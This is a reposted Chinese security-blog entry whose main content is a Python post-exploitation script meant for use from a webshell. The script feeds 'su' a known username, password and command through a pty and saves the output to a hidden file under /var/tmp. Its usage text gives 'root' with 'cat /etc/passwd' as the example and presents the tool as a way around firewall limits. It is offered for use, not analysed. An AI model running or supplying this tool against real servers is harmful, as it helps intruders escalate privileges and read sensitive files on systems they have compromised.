一个知道帐户名密码在Webshell下执行命令的脚本 's

admin 2017年5月8日04:29:16评论456 views字数 981阅读3分16秒阅读模式
摘要

# 鬼仔:xi4oyu最近搞了一个站,这个是他新站开张放出来的。作者:xi4oyu新站开张,放出来吧。以前是应包总之约写的。前后也没给 过几个人,算是个伪私有版。

# 鬼仔:xi4oyu最近搞了一个站,这个是他新站开张放出来的。

作者:xi4oyu

新站开张,放出来吧。以前是应包总之约写的。前后也没给 过几个人,算是个伪私有版。

#!/usr/bin/env python #For God sake, Keep it priv4t3  import sys,os,time,pty def usage():     print "ptyexec.py: fuck the firewall block up"     print "By xi4oyu http://www.pentestday.com"     print "Usage: ptyexec.py <username> <passwd> <command>"     print 'Ext: ptyexec.py root 123456 "cat /etc/passwd"'     print 'Result will be located in /var/tmp'     sys.exit(0)  def fuck_child(pipein):     os.dup2(pipein,0)     fd = open("/var/tmp/.result.txt","a")     os.dup2(fd.fileno(),1)     os.dup2(fd.fileno(),2)     pty.spawn("/bin/sh")      print "GAGA..I'm back,Alt it never be happened"     sys.exit(0)  def fuck_it_up(user,passwd,command):     pipein,pipeout = os.pipe()     #Fork the fucking child     if os.fork() == 0:         fuck_child(pipein)     else:         time.sleep(2)         os.write(pipeout,'su - %s/n'% user)         time.sleep(2)         os.write(pipeout,'%s/n' % passwd)         time.sleep(2)         os.write(pipeout,'%s/n' % command)         time.sleep(2)         os.write(pipeout,'exit/n');         time.sleep(2)         sys.exit(0)  if __name__ == "__main__":     if len(sys.argv) != 4:         usage()     fuck_it_up(sys.argv[1],sys.argv[2],sys.argv[3])

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月8日04:29:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一个知道帐户名密码在Webshell下执行命令的脚本 'shttp://cn-sec.com/archives/45042.html

发表评论

匿名网友 填写信息